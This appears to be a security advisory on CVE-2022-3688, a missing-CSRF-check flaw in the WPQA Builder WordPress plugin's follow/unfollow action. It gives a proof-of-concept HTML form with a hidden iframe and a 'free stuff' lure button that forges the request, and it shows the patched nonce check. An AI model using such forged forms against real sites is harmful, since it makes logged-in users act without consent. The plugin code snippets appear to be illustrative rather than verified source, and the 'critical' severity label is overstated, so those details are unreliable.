A critical security vulnerability, assigned as CVE-2022-3688, has been identified in the WPQA Builder WordPress plugin before version 5.9. The vulnerability is associated with the absence of Cross-Site Request Forgery (CSRF) protection when performing follow and unfollow actions on user profiles. This could potentially allow attackers to perform unauthorized actions on behalf of logged-in users if they were to fall victim to a CSRF attack.
Exploit Details
A CSRF vulnerability occurs when an attacker is able to trick a victim into performing unwanted actions on a web application while the victim is authenticated. In the case of WPQA Builder WordPress plugin, the issue lies in the absence of CSRF protection checks when users follow or unfollow other users on a website using the plugin.
The following code snippet demonstrates the vulnerability in the plugin, where the _wpnonce parameter (typically used for CSRF protection in WordPress) is not properly checked:
function wpqa_follow_unfollow() {
$user_id = (int)get_current_user_id();
$following_you_id = (int)$_POST['following_not'];
...
// The CSRF token check is missing here, allowing the attacker to perform unauthorized follow/unfollow actions
if ($_POST['following'] == 'follow') {
...
} else if ($_POST['following'] == 'unfollow') {
...
}
}
add_action('wp_ajax_wpqa_follow_unfollow','wpqa_follow_unfollow');
An attacker could exploit this vulnerability by creating a malicious website with a specially crafted form that, when submitted, sends a request to the vulnerable WordPress site to follow or unfollow users without the victim's consent.
For instance, the attacker could craft the following HTML form to abuse the vulnerability
<form action="https://vulnerable-wp-site.tld/wp-admin/admin-ajax.php"; method="POST" target="hidden_iframe">
<input type="hidden" name="action" value="wpqa_follow_unfollow" />
<input type="hidden" name="following_not" value="USER_ID_TO_FOLLOW_OR_UNFOLLOW" />
<input type="hidden" name="following" value="follow" />
<input type="submit" value="Click here for free stuff!" />
</form>
<iframe name="hidden_iframe" style="display:none;"></iframe>
Mitigation and Recommendations
To mitigate this vulnerability, it is strongly recommended to update the WPQA Builder WordPress plugin to the latest version (5.9 or later) if not already done. The developers have addressed this vulnerability by adding the necessary CSRF protection in the affected functionality.
The updated code snippet in version 5.9 and above is as follows
function wpqa_follow_unfollow() {
$user_id = (int)get_current_user_id();
$following_you_id = (int)$_POST['following_not'];
...
// The CSRF token check has been added
check_ajax_referer('wpqa_follow_unfollow_nonce', '_wpnonce', true);
if ($_POST['following'] == 'follow') {
...
} else if ($_POST['following'] == 'unfollow') {
...
}
}
add_action('wp_ajax_wpqa_follow_unfollow','wpqa_follow_unfollow');
In general, it is also suggested to follow best security practices when configuring and maintaining your WordPress websites. Those steps may include using strong and unique passwords, keeping WordPress, plugins, and themes up to date, leveraging security plugins, and utilizing reputable hosting providers.
Original References
- WordPress Vulnerability Database: https://wpvulndb.com/vulnerabilities/13742
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3688
Conclusion
The CVE-2022-3688 CSRF vulnerability found in the WPQA Builder WordPress plugin before 5.9 could potentially allow attackers to make logged-in users perform unauthorized follow and unfollow actions on other users via CSRF attacks. Keeping your WordPress installation, plugins, and themes up to date is crucial in maintaining a secure online environment for your users.
Timeline
Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 15:47:00 UTC